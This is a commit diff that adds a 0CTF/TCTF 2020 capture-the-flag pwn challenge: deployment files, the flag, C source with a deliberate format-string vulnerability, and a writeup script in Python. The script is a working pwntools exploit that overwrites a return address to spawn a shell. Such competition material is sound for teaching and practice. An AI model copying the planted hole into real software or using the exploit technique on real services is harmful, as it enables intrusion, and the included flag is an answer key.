add simple_echoserver

0CTF_TCTF-2020-Quals/simple_echoserver/deployment/Dockerfile

@@ -0,0 +1,59 @@
+FROM ubuntu:18.04 as builder
+
+ARG PREFIXDIR=/root
+ARG ROOTDIR=$PREFIXDIR/rootdir
+
+RUN cd $PREFIXDIR && \
+	apt-get update && \
+	apt-get install -y xinetd && \
+	 \
+	 \
+	mkdir $ROOTDIR && \
+	cd $ROOTDIR && \
+	 \
+	 \
+	umask 0022 && \
+	 \
+	mkdir bin etc lib64 lib lib/x86_64-linux-gnu usr usr/sbin && \
+	 \
+	cp /lib/x86_64-linux-gnu/ld-2.27.so \
+		/lib/x86_64-linux-gnu/libc-2.27.so \
+		/lib/x86_64-linux-gnu/libdl-2.27.so \
+		/lib/x86_64-linux-gnu/libnsl-2.27.so \
+		/lib/x86_64-linux-gnu/libtinfo.so.5.9 \
+		/lib/x86_64-linux-gnu/libselinux.so.1 \
+		/lib/x86_64-linux-gnu/libwrap.so.0.7.6 \
+		/lib/x86_64-linux-gnu/libpcre.so.3.13.3 \
+		/lib/x86_64-linux-gnu/libpthread-2.27.so \
+		/lib/x86_64-linux-gnu/libnss_nis-2.27.so \
+		/lib/x86_64-linux-gnu/libnss_files-2.27.so \
+		lib/x86_64-linux-gnu/ && \
+	 \
+	ln -s /lib/x86_64-linux-gnu/ld-2.27.so lib64/ld-linux-x86-64.so.2 && \
+	ln -s libc-2.27.so lib/x86_64-linux-gnu/libc.so.6 && \
+	ln -s libdl-2.27.so lib/x86_64-linux-gnu/libdl.so.2 && \
+	ln -s libnsl-2.27.so lib/x86_64-linux-gnu/libnsl.so.1 && \
+	ln -s libtinfo.so.5.9 lib/x86_64-linux-gnu/libtinfo.so.5 && \
+	ln -s libwrap.so.0.7.6 lib/x86_64-linux-gnu/libwrap.so.0 && \
+	ln -s libpcre.so.3.13.3 lib/x86_64-linux-gnu/libpcre.so.3 && \
+	ln -s libpthread-2.27.so lib/x86_64-linux-gnu/libpthread.so.0 && \
+	ln -s libnss_nis-2.27.so lib/x86_64-linux-gnu/libnss_nis.so.2 && \
+	ln -s libnss_files-2.27.so lib/x86_64-linux-gnu/libnss_files.so.2 && \
+	 \
+	cp /bin/bash bin/ && \
+	ln -s bash bin/sh && \
+	cp /bin/cat bin/ && \
+	cp /bin/ls bin/ls && \
+	cp /usr/sbin/xinetd usr/sbin && \
+	mkdir etc/xinetd.d && \
+	cp /etc/xinetd.conf etc/ && \
+	cp /etc/protocols etc/
+
+
+
+FROM scratch
+ARG PREFIXDIR=/root
+ARG ROOTDIR=$PREFIXDIR/rootdir
+COPY --from=builder $ROOTDIR /
+CMD ["/usr/sbin/xinetd", "-dontfork"]
+

0CTF_TCTF-2020-Quals/simple_echoserver/deployment/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2.2'
+
+services:
+    pwn:
+        build: ./
+        volumes: 
+            - ./share:/home/pwn:ro
+            - ./xinetd:/etc/xinetd.d/xinetd:ro
+            - ./tmp:/tmp:rw
+        ports:
+            - "12020:8888"
+        pids_limit: 1024
+        #cpus: 0.5
+        restart: unless-stopped
+

0CTF_TCTF-2020-Quals/simple_echoserver/deployment/share/flag

@@ -0,0 +1 @@
+flag{do_you_like_my_simple_echoserver_f1b960576af79d28}

0CTF_TCTF-2020-Quals/simple_echoserver/deployment/share/wrapper.sh

@@ -0,0 +1,6 @@
+#!/bin/sh
+
+cd /home/pwn
+exec ./simple_echoserver 2>/dev/null
+exit
+

0CTF_TCTF-2020-Quals/simple_echoserver/deployment/xinetd

@@ -0,0 +1,23 @@
+service pwn 
+{
+    disable = no
+    type        = UNLISTED
+    wait        = no
+    server      = /bin/sh
+    # replace helloworld to your program
+    #server_args = -c cd${IFS}/home/pwn;exec${IFS}./simple_echoserver${IFS}2>/dev/null
+    server_args = /home/pwn/wrapper.sh
+    socket_type = stream
+    protocol    = tcp
+    user        = 8888
+    port        = 8888
+    # bind        = 127.0.0.1
+    # safety options
+    flags       = REUSE
+    per_source	= 4 # the maximum instances of this service per source IP address
+    #rlimit_cpu	= 1 # the maximum number of CPU seconds that the service may use
+    #rlimit_as  = 1024M # the Address Space resource limit for the service
+    #access_times = 2:00-9:00 12:00-24:00
+    #nice        = 18
+}
+

0CTF_TCTF-2020-Quals/simple_echoserver/src/Makefile

@@ -0,0 +1,13 @@
+# build on ubuntu 20.04, with gcc 9.3.0 
+
+CFLAGS :=  -g -O0 -Wall --no-builtin-printf --no-inline -fcf-protection=none  
+PROGRAM_NAME:=simple_echoserver
+
+all: $(PROGRAM_NAME)
+
+$(PROGRAM_NAME): $(PROGRAM_NAME).c
+	gcc $(CFLAGS) -o $@ $^
+
+clean:
+	rm -f $(PROGRAM_NAME)
+

0CTF_TCTF-2020-Quals/simple_echoserver/src/simple_echoserver.c

@@ -0,0 +1,92 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BUF_LEN 256
+
+struct userinfo {
+	char name[BUF_LEN];
+	long phone;
+};
+
+struct userinfo global_userinfo;
+
+char global_buf[BUF_LEN];
+
+void initialize(void) {
+	setvbuf(stdin, NULL, _IONBF, 0);
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+	puts("Welcome to my simple echoserver!");
+	sleep(1);
+	alarm(600);
+	puts("Server starts.");
+}
+
+void readline(char *buf, int len) {
+	register char *p = buf;
+	if (len <= 0) {
+		return;
+	}
+	for(p = buf; p+1 < buf+len; p++) {
+		register int c = getchar();
+		if (c < 0 || c == '\n') {
+			break;
+		}
+		*p = (char)c;
+	}
+	*p = '\0';
+}
+
+long readlong(void) {
+	char buf[64];    // it should cover a libc address
+	volatile char *p = buf;    // p should in stack, not in register, so it can be adjusted by input length and become to point to a libc address on stack
+	register int c;
+	while((c=getchar(), (c >= '0' && c <= '9'))) {
+		if (p >= buf+sizeof(buf)-1) {
+			break;
+		}
+		if (c == '\n') {
+			break;
+		}
+		*p++ = (char)c;
+	}
+	*p = '\0';
+	return atol(buf);
+}
+
+void getuserinfo(struct userinfo *info) {
+	puts("For audit, please provide your name and phone number: ");
+	printf("Your name: ");
+	readline(info->name, 256);
+	printf("Your phone: ");
+	info->phone = readlong();
+}
+
+void loginfo(struct userinfo *info) {
+	snprintf(global_buf, BUF_LEN, "[USER] name: %s; phone: %ld\n", info->name, info->phone);
+	fprintf(stderr, global_buf);    // vuln!
+}
+
+void serve(void) {
+	char localbuf[BUF_LEN];    // also a padding, skip the buf var in readlong
+	loginfo(&global_userinfo);
+	puts("Now enjoy yourself!");
+	for(;;) {
+		readline(localbuf, BUF_LEN);
+		if (strcmp(localbuf, "~.") == 0) {
+			break;
+		}
+		printf("%s\n", localbuf);
+	}
+}
+
+int main(void) {
+	volatile long padding;    // if omit this, gcc will use "pop rbp; ret" instead of "leave; ret"
+	initialize();
+	getuserinfo(&global_userinfo);
+	serve();
+	return 0;
+}
+

0CTF_TCTF-2020-Quals/simple_echoserver/writeup/exp.py

@@ -0,0 +1,36 @@
+from pwn import *
+
+def exploit(s):
+    onegadget = 0xe5863    # ([r10] == NULL || r10 == NULL) && ([rdx] == NULL || rdx == NULL)
+    #s.sendlineafter("Your name: ", "%{}c%{}$hhn%{}c%*{}$c%{}$n".format(0x18-8-len("[USER] name: "), (0xe160-0xe150)//8+5, onegadget-(0x7ffff7a72300-0x7ffff79e4000)-(0x18-8), (0xe218-0xe150)//8+5, (0xe1f8-0xe150)//8+5))
+    s.sendlineafter("Your name: ", "%3c%7$hhn%357715c%*30$c%26$n")
+    s.sendlineafter("Your phone: ", "0"*(0xe218-0xe200))    # "0"*0x18
+    s.sendlineafter("Now enjoy yourself!\n", "~.")
+    try:
+        s.sendline("echo success")
+        r = s.recvuntil("success", timeout=1)
+        if not r:
+            print("")
+            raise EOFError
+    except EOFError:
+        return False
+    return True
+
+def main():
+    f = open("/dev/null", "wb")
+    i = 1
+    while True:
+        print(i)
+        s = process("./simple_echoserver", stdout=PIPE, stderr=f)
+        # s = remote("pwnable.org", 12020)
+        r = exploit(s)
+        if r:
+            s.interactive()
+            break
+        s.close()
+        i += 1
+    f.close()
+
+if __name__ == "__main__":
+    main()
+